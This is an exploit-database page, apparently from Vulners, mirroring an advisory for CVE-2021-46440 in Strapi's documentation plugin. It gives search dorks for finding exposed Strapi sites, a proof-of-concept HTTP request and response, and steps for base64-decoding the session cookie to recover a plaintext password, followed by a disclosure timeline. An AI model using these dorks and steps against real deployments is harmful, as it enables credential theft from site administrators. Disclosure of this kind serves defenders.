Vulners
Lucene search
Strapi 3.6.8 Password Disclosure / Insecure Handling
🗓️ 02 May 2022 00:00:00Reported by Kitchaphan SingchaiType 
packetstorm🔗 packetstormsecurity.com👁 496 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Strapi 3.6.8 Password Disclosure / Insecure Handling Vulnerabilities | 3 May 202200:00 | – | zdt |
 | CVE-2021-46440 | 3 May 202222:35 | – | circl |
 | Strapi 安全漏洞 | 2 May 202200:00 | – | cnnvd |
 | CVE-2021-46440 | 3 May 202217:03 | – | cve |
 | CVE-2021-46440 | 3 May 202217:03 | – | cvelist |
 | EUVD-2022-3114 | 3 Oct 202520:07 | – | euvd |
 | Insecure password handling vulnerability in Strapi | 4 May 202200:00 | – | github |
 | CVE-2021-46440 | 3 May 202218:15 | – | nvd |
 | GHSA-85VG-GRR5-PW42 Insecure password handling vulnerability in Strapi | 4 May 202200:00 | – | osv |
 | Format string | 3 May 202218:15 | – | prion |
10
`# Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format
# Google Dork: intitle:"Welcome to your Strapi ap"
# Shodan search: "X-Powered-By: Strapi <strapi.io>"
# Date: 2022-03-30
# Exploit Author: Kitchaphan Singchai [idealphase]
# Vendor Homepage: https://strapi.io/
# Software Link: https://github.com/strapi/strapi/releases
# Vulnerable Version: < 3.6.9 and < 4.1.5
# Version: 3.6.8
# Tested on: Linux
# CVE: CVE-2021-46440
# Description:
Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.
# This CVE has been fixed via this Github pull request.
- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)
# PoC:
[Request]
POST /documentation/login HTTP/1.1
Host: 127.0.0.1:1337
..[SNIP]..
password=password
[Response]
HTTP/1.1 302 Found
Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponly
Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly
X-Powered-By: Strapi <strapi.io>
..[SNIP]..
Redirecting to <a href="/documentation">/documentation</a>.
Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below.
{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}
# Timeline:
19/Jan/2022 - Inform vulnerability to Strapi team
20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.
8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)
28/Mar/2022 - Reserved CVE-2021-46440
29/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 May 2022 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.03089